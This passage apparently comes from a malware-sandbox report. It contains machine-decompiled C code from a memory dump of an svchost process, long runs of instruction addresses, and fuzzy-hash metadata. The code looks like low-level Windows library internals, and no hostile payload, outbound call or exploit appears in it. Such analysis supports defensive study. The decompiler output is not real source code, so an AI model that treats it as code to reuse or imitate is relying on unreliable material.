                                          							 *(_t528 - 0x9c) = _t529;
                                          							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                          							E03AF5542(_t528 - 0x9c, _t528 - 0x84);
                                          						}
                                          					}
                                          					_t435 = _t427;
                                          					 *(_t528 - 0xd0) = _t435;
                                          					_t474 = _t511 + 0x65;
                                          					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          					_t511 = 0x18;
                                          					while(1) {
                                          						 *(_t528 - 0xa0) = _t427;
                                          						 *(_t528 - 0xbc) = _t427;
                                          						 *(_t528 - 0x80) = _t427;
                                          						 *(_t528 - 0x78) = 0x50;
                                          						 *(_t528 - 0x79) = _t427;
                                          						 *(_t528 - 0x7a) = _t427;
                                          						 *(_t528 - 0x8c) = _t427;
                                          						 *(_t528 - 0x98) = _t427;
                                          						 *(_t528 - 0x90) = _t427;
                                          						 *(_t528 - 0xb0) = _t427;
                                          						 *(_t528 - 0xb8) = _t427;
                                          						_t296 = 1 << _t435;
                                          						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                          						__eflags = _t436 & _t296;
                                          						if((_t436 & _t296) != 0) {
                                          							goto L92;
                                          						}
                                          						__eflags =  *((char*)(_t474 - 1));
                                          						if( *((char*)(_t474 - 1)) == 0) {
                                          							goto L92;
                                          						}
                                          						_t301 =  *_t474;
                                          						__eflags = _t494[1] - _t301;
                                          						if(_t494[1] <= _t301) {
                                          							L10:
                                          							__eflags =  *(_t474 - 5) & 0x00000040;
                                          							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                          								L12:
                                          								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                          								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                          									goto L92;
                                          								}
                                          								_t442 =  *(_t474 - 0x11) & _t494[3];
                                          								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                          								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                          									goto L92;
                                          								}
                                          								__eflags = _t442 -  *(_t474 - 0x11);
                                          								if(_t442 !=  *(_t474 - 0x11)) {
                                          									goto L92;
                                          								}
                                          								L15:
                                          								_t306 =  *(_t474 + 1) & 0x000000ff;
                                          								 *(_t528 - 0xc0) = _t306;
                                          								 *(_t528 - 0xa4) = _t306;
                                          								__eflags =  *0x3b160e8;
                                          								if( *0x3b160e8 != 0) {
                                          									__eflags = _t306 - 0x40;
                                          									if(_t306 < 0x40) {
                                          										L20:
                                          										asm("lock inc dword [eax]");
                                          										_t310 =  *0x3b160e8; // 0x0
                                          										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                          										__eflags = _t311 & 0x00000001;
                                          										if((_t311 & 0x00000001) == 0) {
                                          											 *(_t528 - 0xa0) = _t311;
                                          											_t475 = _t427;
                                          											 *(_t528 - 0x74) = _t427;
                                          											__eflags = _t475;
                                          											if(_t475 != 0) {
                                          												L91:
                                          												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          												goto L92;
                                          											}
                                          											asm("sbb edi, edi");
                                          											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                          											_t511 = _t498;
                                          											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                          											__eflags =  *(_t312 - 5) & 1;
                                          											if(( *(_t312 - 5) & 1) != 0) {
                                          												_push(_t528 - 0x98);
                                          												_push(0x4c);
                                          												_push(_t528 - 0x70);
                                          												_push(1);
                                          												_push(0xfffffffa);
                                          												_t412 = E03A69710();
                                          												_t475 = _t427;
                                          												__eflags = _t412;
                                          												if(_t412 >= 0) {
                                          													_t414 =  *(_t528 - 0x98) - 8;
                                          													 *(_t528 - 0x98) = _t414;
                                          													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                          													 *(_t528 - 0x8c) = _t416;
                                          													 *(_t528 - 0x79) = 1;
                                          													_t511 = (_t416 & 0x0000ffff) + _t498;
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                          											__eflags = _t446 & 0x00000004;
                                          											if((_t446 & 0x00000004) != 0) {
                                          												__eflags =  *(_t528 - 0x9c);
                                          												if( *(_t528 - 0x9c) != 0) {
                                          													 *(_t528 - 0x7a) = 1;
                                          													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                          													__eflags = _t511;
                                          												}
                                          											}
                                          											_t313 = 2;
                                          											_t447 = _t446 & _t313;
                                          											__eflags = _t447;
                                          											 *(_t528 - 0xd4) = _t447;
                                          											if(_t447 != 0) {
                                          												_t406 = 0x10;
                                          												_t511 = _t511 + _t406;
                                          												__eflags = _t511;
                                          											}
                                          											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                          											 *(_t528 - 0x88) = _t427;
                                          											__eflags =  *(_t528 + 0x1c);
                                          											if( *(_t528 + 0x1c) <= 0) {
                                          												L45:
                                          												__eflags =  *(_t528 - 0xb0);
                                          												if( *(_t528 - 0xb0) != 0) {
                                          													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          													__eflags = _t511;
                                          												}
                                          												__eflags = _t475;
                                          												if(_t475 != 0) {
                                          													asm("lock dec dword [ecx+edx*8+0x4]");
                                          													goto L100;
                                          												} else {
                                          													_t494[3] = _t511;
                                          													_t451 =  *(_t528 - 0xa0);
                                          													_t427 = E03A66DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                          													 *(_t528 - 0x88) = _t427;
                                          													__eflags = _t427;
                                          													if(_t427 == 0) {
                                          														__eflags = _t511 - 0xfff8;
                                          														if(_t511 <= 0xfff8) {
                                          															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                          															asm("sbb ecx, ecx");
                                          															__eflags = (_t451 & 0x000000e2) + 8;
                                          														}
                                          														asm("lock dec dword [eax+edx*8+0x4]");
                                          														L100:
                                          														goto L101;
                                          													}
                                          													_t453 =  *(_t528 - 0xa0);
                                          													 *_t494 = _t453;
                                          													_t494[1] = _t427;
                                          													_t494[2] =  *(_t528 - 0xbc);
                                          													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                          													 *_t427 =  *(_t453 + 0x24) | _t511;
                                          													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                          													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x14);
                                          													if( *(_t528 + 0x14) == 0) {
                                          														__eflags =  *[fs:0x18] + 0xf50;
                                          													}
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													asm("movsd");
                                          													__eflags =  *(_t528 + 0x18);
                                          													if( *(_t528 + 0x18) == 0) {
                                          														_t454 =  *(_t528 - 0x80);
                                          														_t479 =  *(_t528 - 0x78);
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													} else {
                                          														_t146 = _t427 + 0x50; // 0x50
                                          														_t454 = _t146;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t382 = 0x18;
                                          														 *_t454 = _t382;
                                          														 *((short*)(_t454 + 2)) = 1;
                                          														_t385 = 0x10;
                                          														 *((short*)(_t454 + 6)) = _t385;
                                          														 *(_t454 + 4) = 0;
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														asm("movsd");
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = 0x68;
                                          														 *(_t528 - 0x78) = _t479;
                                          													}
                                          													__eflags =  *(_t528 - 0x79) - _t327;
                                          													if( *(_t528 - 0x79) == _t327) {
                                          														_t524 = _t479 + _t427;
                                          														_t508 =  *(_t528 - 0x8c);
                                          														 *_t524 = _t508;
                                          														_t373 = 2;
                                          														 *((short*)(_t524 + 2)) = _t373;
                                          														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                          														 *((short*)(_t524 + 4)) = 0;
                                          														_t167 = _t524 + 8; // 0x8
                                          														E03A6F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t380 =  *(_t528 - 0x80);
                                          														__eflags = _t380;
                                          														if(_t380 != 0) {
                                          															_t173 = _t380 + 4;
                                          															 *_t173 =  *(_t380 + 4) | 1;
                                          															__eflags =  *_t173;
                                          														}
                                          														_t454 = _t524;
                                          														 *(_t528 - 0x80) = _t454;
                                          														_t327 = 1;
                                          														__eflags = 1;
                                          													}
                                          													__eflags =  *(_t528 - 0xd4);
                                          													if( *(_t528 - 0xd4) == 0) {
                                          														_t505 =  *(_t528 - 0x80);
                                          													} else {
                                          														_t505 = _t479 + _t427;
                                          														_t523 = 0x10;
                                          														 *_t505 = _t523;
                                          														_t367 = 3;
                                          														 *((short*)(_t505 + 2)) = _t367;
                                          														_t368 = 4;
                                          														 *((short*)(_t505 + 6)) = _t368;
                                          														 *(_t505 + 4) = 0;
                                          														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                          														_t327 = 1;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 = _t479 + _t523;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t454;
                                          														if(_t454 != 0) {
                                          															_t186 = _t454 + 4;
                                          															 *_t186 =  *(_t454 + 4) | 1;
                                          															__eflags =  *_t186;
                                          														}
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0x7a) - _t327;
                                          													if( *(_t528 - 0x7a) == _t327) {
                                          														 *(_t528 - 0xd4) = _t479 + _t427;
                                          														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                          														E03A6F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + _t522;
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t199 = _t505 + 4;
                                          															 *_t199 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t199;
                                          														}
                                          														_t505 =  *(_t528 - 0xd4);
                                          														 *(_t528 - 0x80) = _t505;
                                          													}
                                          													__eflags =  *(_t528 - 0xa8);
                                          													if( *(_t528 - 0xa8) != 0) {
                                          														_t356 = _t479 + _t427;
                                          														 *(_t528 - 0xd4) = _t356;
                                          														_t462 =  *(_t528 - 0xac);
                                          														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                          														_t485 = 0xc;
                                          														 *((short*)(_t356 + 2)) = _t485;
                                          														 *(_t356 + 6) = _t462;
                                          														 *((short*)(_t356 + 4)) = 0;
                                          														_t211 = _t356 + 8; // 0x9
                                          														E03A6F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                          														E03A6FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0x18;
                                          														_t427 =  *(_t528 - 0x88);
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t505 =  *(_t528 - 0xd4);
                                          														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														_t362 =  *(_t528 - 0x80);
                                          														__eflags = _t362;
                                          														if(_t362 != 0) {
                                          															_t222 = _t362 + 4;
                                          															 *_t222 =  *(_t362 + 4) | 1;
                                          															__eflags =  *_t222;
                                          														}
                                          													}
                                          													__eflags =  *(_t528 - 0xb0);
                                          													if( *(_t528 - 0xb0) != 0) {
                                          														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                          														_t458 = 0xb;
                                          														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                          														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                          														 *((short*)(_t427 + 4 + _t479)) = 0;
                                          														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                          														E03A6FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                          														_t529 = _t529 + 0xc;
                                          														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                          														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                          														 *(_t528 - 0x78) = _t479;
                                          														__eflags = _t505;
                                          														if(_t505 != 0) {
                                          															_t241 = _t505 + 4;
                                          															 *_t241 =  *(_t505 + 4) | 1;
                                          															__eflags =  *_t241;
                                          														}
                                          													}
                                          													_t328 =  *(_t528 + 0x1c);
                                          													__eflags = _t328;
                                          													if(_t328 == 0) {
                                          														L87:
                                          														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                          														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                          														_t455 =  *(_t528 - 0xdc);
                                          														 *(_t427 + 0x14) = _t455;
                                          														_t480 =  *(_t528 - 0xa0);
                                          														_t517 = 3;
                                          														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                          														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                          															asm("rdtsc");
                                          															 *(_t427 + 0x3c) = _t480;
                                          														} else {
                                          															 *(_t427 + 0x3c) = _t455;
                                          														}
                                          														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                          														_t456 =  *[fs:0x18];
                                          														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                          														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                          														_t427 = 0;
                                          														__eflags = 0;
                                          														_t511 = 0x18;
                                          														goto L91;
                                          													} else {
                                          														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                          														__eflags = _t519;
                                          														 *(_t528 - 0x8c) = _t328;
                                          														do {
                                          															_t506 =  *((intOrPtr*)(_t519 - 4));
                                          															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                          															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                          															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                          															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                          															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                          																_t334 =  *_t519;
                                          															} else {
                                          																_t334 = 0;
                                          															}
                                          															_t336 = _t334 & 0x000000ff;
                                          															__eflags = _t336;
                                          															_t427 =  *(_t528 - 0x88);
                                          															if(_t336 == 0) {
                                          																_t481 = _t479 + _t506;
                                          																__eflags = _t481;
                                          																 *(_t528 - 0x78) = _t481;
                                          																E03A6F3E0(_t479 + _t427, _t457, _t506);
                                          																_t529 = _t529 + 0xc;
                                          															} else {
                                          																_t340 = _t336 - 1;
                                          																__eflags = _t340;
                                          																if(_t340 == 0) {
                                          																	E03A6F3E0( *(_t528 - 0xb8), _t457, _t506);
                                          																	_t529 = _t529 + 0xc;
                                          																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                          																} else {
                                          																	__eflags = _t340 == 0;
                                          																	if(_t340 == 0) {
                                          																		__eflags = _t506 - 8;
                                          																		if(_t506 == 8) {
                                          																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                          																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                          																		}
                                          																	}
                                          																}
                                          															}
                                          															_t339 = 0x10;
                                          															_t519 = _t519 + _t339;
                                          															_t263 = _t528 - 0x8c;
                                          															 *_t263 =  *(_t528 - 0x8c) - 1;
                                          															__eflags =  *_t263;
                                          															_t479 =  *(_t528 - 0x78);
                                          														} while ( *_t263 != 0);
                                          														goto L87;
                                          													}
                                          												}
                                          											} else {
                                          												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                          												 *(_t528 - 0xa2) = _t392;
                                          												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                          												__eflags = _t469;
                                          												while(1) {
                                          													 *(_t528 - 0xe4) = _t511;
                                          													__eflags = _t392;
                                          													_t393 = _t427;
                                          													if(_t392 != 0) {
                                          														_t393 =  *((intOrPtr*)(_t469 + 4));
                                          													}
                                          													_t395 = (_t393 & 0x000000ff) - _t427;
                                          													__eflags = _t395;
                                          													if(_t395 == 0) {
                                          														_t511 = _t511 +  *_t469;
                                          														__eflags = _t511;
                                          													} else {
                                          														_t398 = _t395 - 1;
                                          														__eflags = _t398;
                                          														if(_t398 == 0) {
                                          															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                          															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                          														} else {
                                          															__eflags = _t398 == 1;
                                          															if(_t398 == 1) {
                                          																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                          																_t402 =  *_t469 & 0x0000ffff;
                                          																 *(_t528 - 0xac) = _t402;
                                          																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                          															}
                                          														}
                                          													}
                                          													__eflags = _t511 -  *(_t528 - 0xe4);
                                          													if(_t511 <  *(_t528 - 0xe4)) {
                                          														break;
                                          													}
                                          													_t397 =  *(_t528 - 0x88) + 1;
                                          													 *(_t528 - 0x88) = _t397;
                                          													_t469 = _t469 + 0x10;
                                          													__eflags = _t397 -  *(_t528 + 0x1c);
                                          													_t392 =  *(_t528 - 0xa2);
                                          													if(_t397 <  *(_t528 + 0x1c)) {
                                          														continue;
                                          													}
                                          													goto L45;
                                          												}
                                          												_t475 = 0x216;
                                          												 *(_t528 - 0x74) = 0x216;
                                          												goto L45;
                                          											}
                                          										} else {
                                          											asm("lock dec dword [eax+ecx*8+0x4]");
                                          											goto L16;
                                          										}
                                          									}
                                          									_t491 = E03AF4CAB(_t306, _t528 - 0xa4);
                                          									 *(_t528 - 0x74) = _t491;
                                          									__eflags = _t491;
                                          									if(_t491 != 0) {
                                          										goto L91;
                                          									} else {
                                          										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                          										goto L20;
                                          									}
                                          								}
                                          								L16:
                                          								 *(_t528 - 0x74) = 0x1069;
                                          								L93:
                                          								_t298 =  *(_t528 - 0xd0) + 1;
                                          								 *(_t528 - 0xd0) = _t298;
                                          								_t474 = _t474 + _t511;
                                          								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                          								_t494 = 4;
                                          								__eflags = _t298 - _t494;
                                          								if(_t298 >= _t494) {
                                          									goto L100;
                                          								}
                                          								_t494 =  *(_t528 - 0xcc);
                                          								_t435 = _t298;
                                          								continue;
                                          							}
                                          							__eflags = _t494[2] | _t494[3];
                                          							if((_t494[2] | _t494[3]) == 0) {
                                          								goto L15;
                                          							}
                                          							goto L12;
                                          						}
                                          						__eflags = _t301;
                                          						if(_t301 != 0) {
                                          							goto L92;
                                          						}
                                          						goto L10;
                                          						L92:
                                          						goto L93;
                                          					}
                                          				} else {
                                          					_push(0x57);
                                          					L101:
                                          					return E03A7D130(_t427, _t494, _t511);
                                          				}
                                          			}










































































                                          0x03af6065
                                          0x03af6067
                                          0x03af606a
                                          0x03af6070
                                          0x03af6075
                                          0x03af6076
                                          0x03af6081
                                          0x03af6087
                                          0x03af6095
                                          0x03af6099
                                          0x03af609e
                                          0x03af60a4
                                          0x03af60ae
                                          0x03af60b0
                                          0x03af60b3
                                          0x03af60b6
                                          0x03af60b8
                                          0x03af60ba
                                          0x03af60ba
                                          0x03af60ba
                                          0x03af60ba
                                          0x03af60be
                                          0x03af60c0
                                          0x03af60c5
                                          0x03af60c5
                                          0x03af60c5
                                          0x03af60c6
                                          0x03af60cd
                                          0x03af6114
                                          0x03af60cf
                                          0x03af60cf
                                          0x03af60d4
                                          0x03af60d5
                                          0x03af60da
                                          0x03af60db
                                          0x03af60e1
                                          0x03af60e2
                                          0x03af60e8
                                          0x03af60f8
                                          0x03af60fd
                                          0x03af60fe
                                          0x03af6102
                                          0x03af6104
                                          0x03af6107
                                          0x03af6109
                                          0x03af610b
                                          0x03af610b
                                          0x03af610b
                                          0x03af610b
                                          0x03af610f
                                          0x03af610f
                                          0x03af6117
                                          0x03af611a
                                          0x03af611f
                                          0x03af6125
                                          0x03af6134
                                          0x03af6139
                                          0x03af613f
                                          0x03af6146
                                          0x03af6148
                                          0x03af614b
                                          0x03af614d
                                          0x03af614f
                                          0x03af614f
                                          0x03af614f
                                          0x03af614f
                                          0x03af6153
                                          0x03af6159
                                          0x03af6159
                                          0x03af615c
                                          0x03af6163
                                          0x03af6169
                                          0x03af616c
                                          0x03af6172
                                          0x03af6181
                                          0x03af6186
                                          0x03af6187
                                          0x03af618b
                                          0x03af6191
                                          0x03af6195
                                          0x03af61a3
                                          0x03af61bb
                                          0x03af61c0
                                          0x03af61c3
                                          0x03af61cc
                                          0x03af61d0
                                          0x03af61dc
                                          0x03af61de
                                          0x03af61e1
                                          0x03af61e4
                                          0x03af61e6
                                          0x03af61e8
                                          0x03af61e8
                                          0x03af61e8
                                          0x03af61e8
                                          0x03af61e6
                                          0x03af61ec
                                          0x03af61f3
                                          0x03af6203
                                          0x03af6209
                                          0x03af620a
                                          0x03af6216
                                          0x03af621d
                                          0x03af6227
                                          0x03af6241
                                          0x03af6246
                                          0x03af624c
                                          0x03af6257
                                          0x03af6259
                                          0x03af625c
                                          0x03af625e
                                          0x03af6260
                                          0x03af6260
                                          0x03af6260
                                          0x03af6260
                                          0x03af625e
                                          0x03af6264
                                          0x03af6267
                                          0x03af6269
                                          0x03af6315
                                          0x03af6315
                                          0x03af631b
                                          0x03af631e
                                          0x03af6324
                                          0x03af6327
                                          0x03af632f
                                          0x03af6330
                                          0x03af6333
                                          0x03af633a
                                          0x03af633c
                                          0x03af6335
                                          0x03af6335
                                          0x03af6335
                                          0x03af633f
                                          0x03af6342
                                          0x03af634c
                                          0x03af6352
                                          0x03af6355
                                          0x03af6355
                                          0x03af6359
                                          0x00000000
                                          0x03af626f
                                          0x03af6275
                                          0x03af6275
                                          0x03af6278
                                          0x03af627e
                                          0x03af627e
                                          0x03af6281
                                          0x03af6287
                                          0x03af628d
                                          0x03af6298
                                          0x03af629c
                                          0x03af62a2
                                          0x03af629e
                                          0x03af629e
                                          0x03af629e
                                          0x03af62a7
                                          0x03af62a7
                                          0x03af62aa
                                          0x03af62b0
                                          0x03af62f0
                                          0x03af62f0
                                          0x03af62f2
                                          0x03af62f8
                                          0x03af62fd
                                          0x03af62b2
                                          0x03af62b2
                                          0x03af62b2
                                          0x03af62b5
                                          0x03af62dd
                                          0x03af62e2
                                          0x03af62e5
                                          0x03af62b7
                                          0x03af62b8
                                          0x03af62bb
                                          0x03af62bd
                                          0x03af62c0
                                          0x03af62c4
                                          0x03af62cd
                                          0x03af62cd
                                          0x03af62c0
                                          0x03af62bb
                                          0x03af62b5
                                          0x03af6302
                                          0x03af6303
                                          0x03af6305
                                          0x03af6305
                                          0x03af6305
                                          0x03af630c
                                          0x03af630c
                                          0x00000000
                                          0x03af627e
                                          0x03af6269
                                          0x03af5eac
                                          0x03af5ebb
                                          0x03af5ebe
                                          0x03af5ecb
                                          0x03af5ecb
                                          0x03af5ece
                                          0x03af5ece
                                          0x03af5ed4
                                          0x03af5ed7
                                          0x03af5ed9
                                          0x03af5edb
                                          0x03af5edb
                                          0x03af5ee1
                                          0x03af5ee1
                                          0x03af5ee3
                                          0x03af5f20
                                          0x03af5f20
                                          0x03af5ee5
                                          0x03af5ee5
                                          0x03af5ee5
                                          0x03af5ee8
                                          0x03af5f11
                                          0x03af5f18
                                          0x03af5eea
                                          0x03af5eea
                                          0x03af5eed
                                          0x03af5ef2
                                          0x03af5ef8
                                          0x03af5efb
                                          0x03af5f0a
                                          0x03af5f0a
                                          0x03af5eed
                                          0x03af5ee8
                                          0x03af5f22
                                          0x03af5f28
                                          0x00000000
                                          0x00000000
                                          0x03af5f30
                                          0x03af5f31
                                          0x03af5f37
                                          0x03af5f3a
                                          0x03af5f3d
                                          0x03af5f44
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03af5f46
                                          0x03af5f48
                                          0x03af5f4d
                                          0x00000000
                                          0x03af5f4d
                                          0x03af5dda
                                          0x03af5ddf
                                          0x00000000
                                          0x03af5ddf
                                          0x03af5dd8
                                          0x03af5da7
                                          0x03af5da9
                                          0x03af5dac
                                          0x03af5dae
                                          0x00000000
                                          0x03af5db4
                                          0x03af5db4
                                          0x00000000
                                          0x03af5db4
                                          0x03af5dae
                                          0x03af5d88
                                          0x03af5d8d
                                          0x03af6363
                                          0x03af6369
                                          0x03af636a
                                          0x03af6370
                                          0x03af6372
                                          0x03af637a
                                          0x03af637b
                                          0x03af637d
                                          0x00000000
                                          0x00000000
                                          0x03af637f
                                          0x03af6385
                                          0x00000000
                                          0x03af6385
                                          0x03af5d38
                                          0x03af5d3b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03af5d3b
                                          0x03af5d27
                                          0x03af5d29
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03af6360
                                          0x00000000
                                          0x03af6360
                                          0x03af5c10
                                          0x03af5c10
                                          0x03af63da
                                          0x03af63e5
                                          0x03af63e5

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 490cfce06282eec4ca219b8c7d6c3dd34f322510b6662e55ec889853d977276a
                                          • Instruction ID: c37edefe195aac27485ff5c6a408459f7a19c91b63caf179a30bc314837a7800
                                          • Opcode Fuzzy Hash: 490cfce06282eec4ca219b8c7d6c3dd34f322510b6662e55ec889853d977276a
                                          • Instruction Fuzzy Hash: 0B423975D002298FDB24CFA8C980BA9F7B1FF49304F1981AEE94DAB252D7359985CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E03A44120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                          				signed int _v8;
                                          				void* _v20;
                                          				signed int _v24;
                                          				char _v532;
                                          				char _v540;
                                          				signed short _v544;
                                          				signed int _v548;
                                          				signed short* _v552;
                                          				signed short _v556;
                                          				signed short* _v560;
                                          				signed short* _v564;
                                          				signed short* _v568;
                                          				void* _v570;
                                          				signed short* _v572;
                                          				signed short _v576;
                                          				signed int _v580;
                                          				char _v581;
                                          				void* _v584;
                                          				unsigned int _v588;
                                          				signed short* _v592;
                                          				void* _v597;
                                          				void* _v600;
                                          				void* _v604;
                                          				void* _v609;
                                          				void* _v616;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				unsigned int _t161;
                                          				signed int _t162;
                                          				unsigned int _t163;
                                          				void* _t169;
                                          				signed short _t173;
                                          				signed short _t177;
                                          				signed short _t181;
                                          				unsigned int _t182;
                                          				signed int _t185;
                                          				signed int _t213;
                                          				signed int _t225;
                                          				short _t233;
                                          				signed char _t234;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				signed int _t250;
                                          				void* _t251;
                                          				signed short* _t254;
                                          				void* _t255;
                                          				signed int _t256;
                                          				void* _t257;
                                          				signed short* _t260;
                                          				signed short _t265;
                                          				signed short* _t269;
                                          				signed short _t271;
                                          				signed short** _t272;
                                          				signed short* _t275;
                                          				signed short _t282;
                                          				signed short _t283;
                                          				signed short _t290;
                                          				signed short _t299;
                                          				signed short _t307;
                                          				signed int _t308;
                                          				signed short _t311;
                                          				signed short* _t315;
                                          				signed short _t316;
                                          				void* _t317;
                                          				void* _t319;
                                          				signed short* _t321;
                                          				void* _t322;
                                          				void* _t323;
                                          				unsigned int _t324;
                                          				signed int _t325;
                                          				void* _t326;
                                          				signed int _t327;
                                          				signed int _t329;
                                          
                                          				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                          				_v8 =  *0x3b1d360 ^ _t329;
                                          				_t157 = _a8;
                                          				_t321 = _a4;
                                          				_t315 = __edx;
                                          				_v548 = __ecx;
                                          				_t305 = _a20;
                                          				_v560 = _a12;
                                          				_t260 = _a16;
                                          				_v564 = __edx;
                                          				_v580 = _a8;
                                          				_v572 = _t260;
                                          				_v544 = _a20;
                                          				if( *__edx <= 8) {
                                          					L3:
                                          					if(_t260 != 0) {
                                          						 *_t260 = 0;
                                          					}
                                          					_t254 =  &_v532;
                                          					_v588 = 0x208;
                                          					if((_v548 & 0x00000001) != 0) {
                                          						_v556 =  *_t315;
                                          						_v552 = _t315[2];
                                          						_t161 = E03A5F232( &_v556);
                                          						_t316 = _v556;
                                          						_v540 = _t161;
                                          						goto L17;
                                          					} else {
